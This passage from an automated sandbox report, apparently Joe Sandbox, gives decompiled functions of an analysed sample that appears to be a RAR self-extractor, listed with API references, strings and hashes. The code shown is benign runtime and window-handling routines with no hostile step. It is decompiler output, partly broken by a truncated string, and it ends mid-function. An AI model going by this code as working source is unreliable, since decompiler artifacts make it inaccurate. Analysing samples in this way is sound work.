_wcschr.LIBVCRUNTIME ref: 0007C5D1
EndDialog.USER32(?,00000001), ref: 0007C6B2

Strings

%s%s%u, xrefs: 0007C573

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: e10bf96e246c81b8bafabd7f5ec523a2b6074ccacfa7d04e156144e25c04e851
Instruction ID: 9b76235a52feb506b7b46459c33de64cd747f10484b02af02ec90a06b1d2e79a
Opcode Fuzzy Hash: e10bf96e246c81b8bafabd7f5ec523a2b6074ccacfa7d04e156144e25c04e851
Instruction Fuzzy Hash: E241E571D00618BAEF22DBA0DC85EEA77BCEF09705F0080A6E50DE6061E7799BC4CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00078E62 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00078E62(void* __ecx, void* __edx) {
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t60;
				intOrPtr* _t62;
				short* _t64;
				short* _t66;
				intOrPtr* _t70;
				long _t72;
				void* _t74;
				void* _t75;

				_t60 = __edx;
				_t45 = __ecx;
				_t44 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					return _t20;
				}
				 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
				_t62 =  *((intOrPtr*)(_t74 + 0x1c));
				 *((char*)(_t74 + 0x13)) = E00078D0A(_t62);
				_push(0x200 + E000835B3(_t62) * 2);
				_t24 = E000835D3(_t45);
				_t66 = _t24;
				if(_t66 == 0) {
					L16:
					return _t24;
				}
				E000857E6(_t66, L"<html>");
				E00087168(_t66, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E00087168(_t66, L"utf-8\"></head>");
				_t75 = _t74 + 0x18;
				_t70 = _t62;
				_t28 = 0x20;
				if( *_t62 != _t28) {
					L4:
					_t29 = E000717CE(_t79, _t70, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t75 + 0x18)) = _t31;
					if(_t31 != 0) {
						_t62 = _t70 + 0xc;
					}
					E00087168(_t66, _t62);
					if( *((char*)(_t75 + 0x20)) == 0) {
						E00087168(_t66, L"</html>");
					}
					_t82 =  *((char*)(_t75 + 0x13));
					if( *((char*)(_t75 + 0x13)) == 0) {
						_push(_t66);
						_t66 = E00079098(_t60, _t82);
					}
					_t72 = 9 + E000835B3(_t66) * 6;
					_t64 = GlobalAlloc(0x40, _t72);
					if(_t64 != 0) {
						_t13 = _t64 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t66, 0xffffffff, _t13, _t72 - 3, 0, 0) == 0) {
							 *_t64 = 0;
						} else {
							 *_t64 = 0xbbef;
							 *((char*)(_t64 + 2)) = 0xbf;
						}
					}
					L000835CE(_t66);
					_t24 =  *0xc2178(_t64, 1, _t75 + 0x14);
					if(_t24 >= 0) {
						E00078D41( *((intOrPtr*)(_t44 + 0x10)));
						_t38 =  *((intOrPtr*)(_t75 + 0x10));
						 *0x93260(_t38,  *((intOrPtr*)(_t75 + 0x10)));
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t70 + 2;
					_t79 =  *_t70 - _t28;
				} while ( *_t70 == _t28);
				goto L4;
			}

0x00078e62
0x00078e62
0x00078e66
0x00078e6c
0x00078fb3
0x00078fb3
0x00078e72
0x00078e79
0x00078e84
0x00078e94
0x00078e95
0x00078e9a
0x00078ea0
0x00078fad
0x00000000
0x00078fae
0x00078ead
0x00078eb8
0x00078ec3
0x00078ec8
0x00078ecb
0x00078ecf
0x00078ed3
0x00078ede
0x00078ee6
0x00078eed
0x00078eef
0x00078ef1
0x00078ef5
0x00078ef7
0x00078ef7
0x00078efc
0x00078f08
0x00078f10
0x00078f16
0x00078f17
0x00078f1c
0x00078f1e
0x00078f26
0x00078f26
0x00078f32
0x00078f3e
0x00078f42
0x00078f4c
0x00078f61
0x00078f6e
0x00078f63
0x00078f63
0x00078f68
0x00078f68
0x00078f61
0x00078f72
0x00078f80
0x00078f89
0x00078f94
0x00078f99
0x00078fa5
0x00078fab
0x00078fab
0x00000000
0x00000000
0x00000000
0x00000000
0x00078ed5
0x00078ed5
0x00078ed5
0x00078ed8
0x00078ed8
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 00078F38
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00078F59

Strings

utf-8"></head>, xrefs: 00078EBD
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00078EB2
</html>, xrefs: 00078F0A
<html>, xrefs: 00078EA7, 00078EE0

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 3286310052-4209811716
Opcode ID: 8406b801198f76aa46f3ee0f6e7e7403f39713c751bdaf1f1cfe7437209a862a
Instruction ID: 6e37c32d32c668de1eb4f0173d999664bb827e5dbe41f78289192dc055dd63ce
Opcode Fuzzy Hash: 8406b801198f76aa46f3ee0f6e7e7403f39713c751bdaf1f1cfe7437209a862a
Instruction Fuzzy Hash: C7316E319483017BDB24BB649C4AFEF7798FF51720F10C01AF909961C2EF68990983A9

Uniqueness

Uniqueness Score: -1.00%

Function 00079635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00079635(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t32;
				struct HWND__* _t43;
				intOrPtr* _t51;
				void* _t58;
				WCHAR* _t65;
				struct HWND__* _t66;

				_t66 = _a8;
				_t51 = __ecx;
				 *(__ecx + 8) = _t66;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t66, 0);
				E00079344(_t51, _a4);
				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
					L000835CE( *((intOrPtr*)(_t51 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t32 = E00087107(_t51, _t58);
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
				GetWindowRect(_t66,  &_v16);
				 *0xc2108(0,  *0xc2154(_t66,  &_v16, 2));
				if( *(_t51 + 4) != 0) {
					 *0xc2110( *(_t51 + 4));
				}
				_t39 = _v36;
				_t19 = _t39 + 1; // 0x1
				_t43 =  *0xc2118(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0xc2154(_t66, 0,  *_t51, _t51, _t58));
				 *(_t51 + 4) = _t43;
				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
					__eflags = _t43;
					if(_t43 != 0) {
						ShowWindow(_t43, 5);
						return  *0xc210c( *(_t51 + 4));
					}
				} else {
					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
							_t43 = E0007943C(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
							_t65 = _t43;
							if(_t65 != 0) {
								ShowWindow(_t66, 5);
								SetWindowTextW(_t66, _t65);
								return L000835CE(_t65);
							}
						}
					}
				}
				return _t43;
			}

0x0007963e
0x00079642
0x00079648
0x0007964b
0x0007964e
0x0007965a
0x00079663
0x00079668
0x0007966d
0x00079673
0x00079679
0x0007967d
0x00079675
0x00079675
0x00079675
0x00079683
0x0007968a
0x00079693
0x000796aa
0x000796b4
0x000796b9
0x000796b9
0x000796bf
0x000796cd
0x000796fa
0x00079700
0x00079707
0x00079741
0x00079743
0x00079748
0x00000000
0x00079751
0x00079709
0x0007970b
0x00079712
0x00079715
0x0007971c
0x00079721
0x00079725
0x0007972a
0x00079732
0x00000000
0x0007973e
0x00079725
0x00079715
0x0007970b
0x0007975d

APIs

ShowWindow.USER32(?,00000000), ref: 0007964E
GetWindowRect.USER32(?,00000000), ref: 00079693
ShowWindow.USER32(?,00000005,00000000), ref: 0007972A
SetWindowTextW.USER32(?,00000000), ref: 00079732
ShowWindow.USER32(00000000,00000005), ref: 00079748

Strings

RarHtmlClassName, xrefs: 000796F4

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 42bd9461de27f6da1e263902522d537841cbd3b6af0f696cd189d4eae1a3ecb0
Instruction ID: 7ef6590a1cc145f3e5b343d2bd7674f8b027080a358e420130f3ea9193a1047e
Opcode Fuzzy Hash: 42bd9461de27f6da1e263902522d537841cbd3b6af0f696cd189d4eae1a3ecb0
Instruction Fuzzy Hash: 6631D031804300EFDB61AF64DC48F6B7BA8EF48701F058559FE499A262CB38D955CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0008BFB5 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0008BFB5(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E0008BF79(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x93974
					E0008BF79(_t2, 7);
					_t3 = _t45 + 0x38; // 0x93990
					E0008BF79(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x939c0
					E0008BF79(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x939f0
					E0008BF79(_t5, 2);
					_t6 = _t45 + 0xa0; // 0x65004d
					E000884DE( *_t6);
					_t7 = _t45 + 0xa4; // 0x6f006d
					E000884DE( *_t7);
					_t8 = _t45 + 0xa8; // 0x790072
					E000884DE( *_t8);
					_t9 = _t45 + 0xb4; // 0x93a0c
					E0008BF79(_t9, 7);
					_t10 = _t45 + 0xd0; // 0x93a28
					E0008BF79(_t10, 7);
					_t11 = _t45 + 0xec; // 0x93a44
					E0008BF79(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x93a74
					E0008BF79(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x93aa4
					E0008BF79(_t13, 2);
					_t14 = _t45 + 0x154; // 0x76f988da
					E000884DE( *_t14);
					_t15 = _t45 + 0x158; // 0x983e5152
					E000884DE( *_t15);
					_t16 = _t45 + 0x15c; // 0xa831c66d
					E000884DE( *_t16);
					_t17 = _t45 + 0x160; // 0xb00327c8
					return E000884DE( *_t17);
				}
				return _t18;
			}

0x0008bfbb
0x0008bfc0
0x0008bfc9
0x0008bfce
0x0008bfd4
0x0008bfd9
0x0008bfdf
0x0008bfe4
0x0008bfea
0x0008bfef
0x0008bff8
0x0008bffd
0x0008c003
0x0008c008
0x0008c00e
0x0008c013
0x0008c019
0x0008c01e
0x0008c027
0x0008c02c
0x0008c035
0x0008c03d
0x0008c046
0x0008c04b
0x0008c054
0x0008c059
0x0008c062
0x0008c067
0x0008c06d
0x0008c072
0x0008c078
0x0008c07d
0x0008c083
0x0008c088
0x00000000
0x0008c093
0x0008c098

APIs

Part of subcall function 0008BF79: _free.LIBCMT ref: 0008BFA2

_free.LIBCMT ref: 0008C003

Part of subcall function 000884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0008BFA7,00093958,00000000,00093958,00000000,?,0008BFCE,00093958,00000007,00093958,?,0008C3CB,00093958), ref: 000884F4
Part of subcall function 000884DE: GetLastError.KERNEL32(00093958,?,0008BFA7,00093958,00000000,00093958,00000000,?,0008BFCE,00093958,00000007,00093958,?,0008C3CB,00093958,00093958), ref: 00088506

_free.LIBCMT ref: 0008C00E
_free.LIBCMT ref: 0008C019
_free.LIBCMT ref: 0008C06D
_free.LIBCMT ref: 0008C078
_free.LIBCMT ref: 0008C083
_free.LIBCMT ref: 0008C08E

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction ID: 9b5f4e0beb45d6bec7dd60b5dbd4f2df439eeee270b01fb2a6a99f8939f6ca7b
Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction Fuzzy Hash: 5111CC72940B48FAD620BBB0CC46FCBB79D7F05700F808865B2D966553DF65F9088B94

Uniqueness

Uniqueness Score: -1.00%

Function 000820CA Relevance: 10.6, APIs: 7, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E000820CA(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x9e680 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E0008330E(__eflags,  *0x9e680);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00083348(__eflags,  *0x9e680, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E000885A9(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00083348(__eflags,  *0x9e680, 0);
								} else {
									__eflags = E00083348(__eflags,  *0x9e680, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E000884DE(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

0x000820d1
0x000820e4
0x000820eb
0x000820ee
0x000820f1
0x0008210a
0x0008210a
0x000820f3
0x000820f3
0x000820f5
0x000820ff
0x00082105
0x00082106
0x00082108
0x00082118
0x0008211c
0x0008211e
0x00082132
0x00082132
0x0008213b
0x00082120
0x0008212e
0x00082130
0x00082144
0x00082146
0x00082146
0x00000000
0x00000000
0x00000000
0x00082130
0x00082149
0x00000000
0x00000000
0x00000000
0x00082108
0x000820f5
0x00082151
0x0008215b
0x000820d3
0x000820d5
0x000820d5

APIs

GetLastError.KERNEL32(?,?,000820C1,0007FB12), ref: 000820D8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000820E6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000820FF
SetLastError.KERNEL32(00000000,?,000820C1,0007FB12), ref: 00082151

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9021ca125cd0cfedf71fe0525155bbab2d51092e6e2624e05a2a5617b079c454
Instruction ID: f55670f0ad2da3919d91d269f72fcd57148f68ae83b12b87fed17674f19019a9
Opcode Fuzzy Hash: 9021ca125cd0cfedf71fe0525155bbab2d51092e6e2624e05a2a5617b079c454
Instruction Fuzzy Hash: 7901D832109711AEBAA43BB5FC8956A2A84FB71B70731062BF250551E2EE154D019744

Uniqueness

Uniqueness Score: -1.00%

Function 00089029 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E00089029(void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x9e6ac; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E000885A9(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E0008A671(_t13, _t17, __eflags,  *0x9e6ac, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E00088E16(_t13, _t16, "X\xef\xbf							E000884DE(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E000884DE();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E0008A61B(_t11, _t17, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x00089029
0x00089034
0x00089036
0x00089038
0x0008903d
0x00089040
0x0008904e
0x0008905a
0x0008905d
0x00089060
0x00089072
0x00089077
0x00089079
0x00089084
0x0008908a
0x00089092
0x00089094
0x00000000
0x00000000
0x00000000
0x00000000
0x0008907b
0x0008907b
0x00000000
0x0008907b
0x00089062
0x00089062
0x00089063
0x00089063
0x00089096
0x00089097
0x00089097
0x00089042
0x00089048
0x0008904c
0x0008909f
0x000890a0
0x000890a6
0x00000000
0x00000000
0x00000000
0x0008904c
0x000890ad

APIs

GetLastError.KERNEL32(?,000A0EE8,00000200,0008895F,000858FE,?,?,?,?,0006D25E,?,032445C8,00000063,00000004,0006CFE0,?), ref: 0008902E
_free.LIBCMT ref: 00089063
_free.LIBCMT ref: 0008908A
SetLastError.KERNEL32(00000000,00093958,00000050,000A0EE8), ref: 00089097
SetLastError.KERNEL32(00000000,00093958,00000050,000A0EE8), ref: 000890A0

Strings

X, xrefs: 0008907E

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ErrorLast$_free
String ID: X
API String ID: 3170660625-2800284421
Opcode ID: 4646b5768d40f2eebcac22ecc34308bd0b726a310779da7d4beb1de3535edec4
Instruction ID: 6f5d4b86fd3bfdd1d2d8732c0ec3aa5f9762d98157541883dfcfafff193d5cb2
Opcode Fuzzy Hash: 4646b5768d40f2eebcac22ecc34308bd0b726a310779da7d4beb1de3535edec4
Instruction Fuzzy Hash: 6401F436605B006EA33277746C85ABB3AADBBD13B1728012AF585A2253EF648C115B60

Uniqueness

Uniqueness Score: -1.00%

Function 0007DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E0007DC9A() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0xc0cd0;
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0xc0cd4 = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0xc0cd8 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}

0x0007dc9a
0x0007dca5
0x0007dcad
0x0007dcbf
0x0007dcc3
0x0007dccf
0x0007dcd7
0x00000000
0x0007dcd9
0x0007dcdf
0x0007dce4
0x0007dcec
0x00000000
0x0007dcee
0x0007dcee
0x0007dcee
0x0007dcec
0x0007dcc5
0x0007dcc5
0x0007dcc5
0x0007dcc5
0x0007dcfc
0x0007dd02
0x0007dd0a
0x0007dd10
0x00000000
0x00000000
0x00000000
0x0007dd0c
0x0007dd0c
0x0007dd0c
0x0007dd0c
0x0007dd14
0x0007dcaf
0x0007dcb2
0x0007dcb2
0x0007dca7
0x0007dcaa
0x0007dcaa

Strings

AcquireSRWLockExclusive, xrefs: 0007DCC9
KERNEL32.DLL, xrefs: 0007DCB4
ReleaseSRWLockExclusive, xrefs: 0007DCD9

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: 8a3443d5245d74a124eb3f3ad30872c678a5c2871cdc796ae9da0bb2e8c5a615
Instruction ID: 64ecd8a0b3d56daf82732c03cfc3e0ee9445cc64371354dc107ffa22e22a0090
Opcode Fuzzy Hash: 8a3443d5245d74a124eb3f3ad30872c678a5c2871cdc796ae9da0bb2e8c5a615
Instruction Fuzzy Hash: C401D661A413239B5FB25F655CD16A623F4AF81317320813BE60DD7200EA5ECC41D6A4

Uniqueness

Uniqueness Score: -1.00%

Function 00088060 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00088060(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x9ed40; // 0x3232130
					if(_t7 != 0x9eb20) {
						E000884DE(_t7);
						 *0x9ed40 = 0x9eb20;
					}
				}
				E000884DE( *0xc1288);
				 *0xc1288 = 0;
				E000884DE( *0xc128c);
				 *0xc128c = 0;
				E000884DE( *0xc16d8);
				 *0xc16d8 = 0;
				E000884DE( *0xc16dc);
				 *0xc16dc = 0;
				return 1;
			}

0x00088069
0x0008806d
0x0008806f
0x0008807b
0x0008807e
0x00088084
0x00088084
0x0008807b
0x00088090
0x0008809d
0x000880a3
0x000880ae
0x000880b4
0x000880bf
0x000880c5
0x000880cd
0x000880d6

APIs

_free.LIBCMT ref: 0008807E

Part of subcall function 000884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0008BFA7,00093958,00000000,00093958,00000000,?,0008BFCE,00093958,00000007,00093958,?,0008C3CB,00093958), ref: 000884F4
Part of subcall function 000884DE: GetLastError.KERNEL32(00093958,?,0008BFA7,00093958,00000000,00093958,00000000,?,0008BFCE,00093958,00000007,00093958,?,0008C3CB,00093958,00093958), ref: 00088506

_free.LIBCMT ref: 00088090
_free.LIBCMT ref: 000880A3
_free.LIBCMT ref: 000880B4
_free.LIBCMT ref: 000880C5

Strings

, xrefs: 00088074

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-1867143179
Opcode ID: 225ae330ab46047ff5a45358ecd93d8469790875d9df5e24c9ebc795f6bacc6f
Instruction ID: 4269a702277ed41b749f376ffe98cf090a47cf6af9d547f250de3035392d1636
Opcode Fuzzy Hash: 225ae330ab46047ff5a45358ecd93d8469790875d9df5e24c9ebc795f6bacc6f
Instruction Fuzzy Hash: BBF03A7A902125CBB751BF15FC018D63B65F716720348960AF45097BB3CB3908619FC1

Uniqueness

Uniqueness Score: -1.00%

Function 00070CBE Relevance: 9.1, APIs: 6, Instructions: 94
timeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00070CBE(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				struct _SYSTEMTIME _v44;
